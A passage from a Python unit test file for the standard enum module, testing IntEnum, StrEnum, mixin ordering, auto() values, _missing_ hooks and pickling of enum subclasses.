self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
self.assertTrue(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_wierd(self):
weird_auto = auto()
weird_auto.value = 'pathological case'
class Color(Enum):
red = weird_auto
def _generate_next_value_(name, start, count, last):
return name
blue = auto()
self.assertEqual(list(Color), [Color.red, Color.blue])
self.assertEqual(Color.red.value, 'pathological case')
self.assertEqual(Color.blue.value, 'blue')
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_default_missing(self):
class Color(Enum):
RED = 1
GREEN = 2
BLUE = 3
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
try:
Color(7)
except ValueError as exc:
self.assertTrue(exc.__context__ is None)
else:
raise Exception('Exception not raised.')
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_missing_exceptions_reset(self):
import weakref
#
class TestEnum(enum.Enum):
VAL1 = 'val1'
VAL2 = 'val2'
#
class Class1:
def __init__(self):
# Gracefully handle an exception of our own making
try:
raise ValueError()
except ValueError:
pass
#
class Class2:
def __init__(self):
# Gracefully handle an exception of Enum's making
try:
TestEnum('invalid_value')
except ValueError:
pass
# No strong refs here so these are free to die.
class_1_ref = weakref.ref(Class1())
class_2_ref = weakref.ref(Class2())
#
# The exception raised by Enum creates a reference loop and thus
# Class2 instances will stick around until the next gargage collection
# cycle, unlike Class1.
self.assertIs(class_1_ref(), None)
self.assertIs(class_2_ref(), None)
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
def test_multiple_inherited_mixin(self):
@unique
class Decision1(StrEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
class MyEnum(StrEnum):
pass
@unique
class Decision2(MyEnum):
REVERT = "REVERT"
REVERT_ALL = "REVERT_ALL"
RETRY = "RETRY"
def test_multiple_mixin_inherited(self):
class MyInt(int):
def __new__(cls, value):
return super().__new__(cls, value)
class HexMixin:
def __repr__(self):
return hex(self)
class MyIntEnum(HexMixin, MyInt, enum.Enum):
pass
class Foo(MyIntEnum):
TEST = 1
self.assertTrue(isinstance(Foo.TEST, MyInt))
self.assertEqual(repr(Foo.TEST), "0x1")
class Fee(MyIntEnum):
TEST = 1
def __new__(cls, value):
value += 1
member = int.__new__(cls, value)
member._value_ = value
return member
self.assertEqual(Fee.TEST, 2)
def test_miltuple_mixin_with_common_data_type(self):
class CaseInsensitiveStrEnum(str, Enum):
@classmethod
def _missing_(cls, value):
for member in cls._member_map_.values():
if member._value_.lower() == value.lower():
return member
return super()._missing_(value)
#
class LenientStrEnum(str, Enum):
def __init__(self, *args):
self._valid = True
@classmethod
def _missing_(cls, value):
unknown = cls._member_type_.__new__(cls, value)
unknown._valid = False
unknown._name_ = value.upper()
unknown._value_ = value
cls._member_map_[value] = unknown
return unknown
@property
def valid(self):
return self._valid
#
class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum):
ACTIVE = "active"
PENDING = "pending"
TERMINATED = "terminated"
#
JS = JobStatus
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
missing = JS('missing')
self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED])
self.assertEqual(JS.ACTIVE, 'active')
self.assertEqual(JS.ACTIVE.value, 'active')
self.assertIs(JS('Active'), JS.ACTIVE)
self.assertTrue(JS.ACTIVE.valid)
self.assertTrue(isinstance(missing, JS))
self.assertFalse(missing.valid)
def test_empty_globals(self):
# bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError
# when using compile and exec because f_globals is empty
code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')"
code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
def test_strenum(self):
class GoodStrEnum(StrEnum):
one = '1'
two = '2'
three = b'3', 'ascii'
four = b'4', 'latin1', 'strict'
self.assertEqual(GoodStrEnum.one, '1')
self.assertEqual(str(GoodStrEnum.one), '1')
self.assertEqual('{}'.format(GoodStrEnum.one), '1')
self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one))
self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one))
self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one')
#
class DumbMixin:
def __str__(self):
return "don't do this"
class DumbStrEnum(DumbMixin, StrEnum):
five = '5'
six = '6'
seven = '7'
self.assertEqual(DumbStrEnum.seven, '7')
self.assertEqual(str(DumbStrEnum.seven), "don't do this")
#
class EnumMixin(Enum):
def hello(self):
print('hello from %s' % (self, ))
class HelloEnum(EnumMixin, StrEnum):
eight = '8'
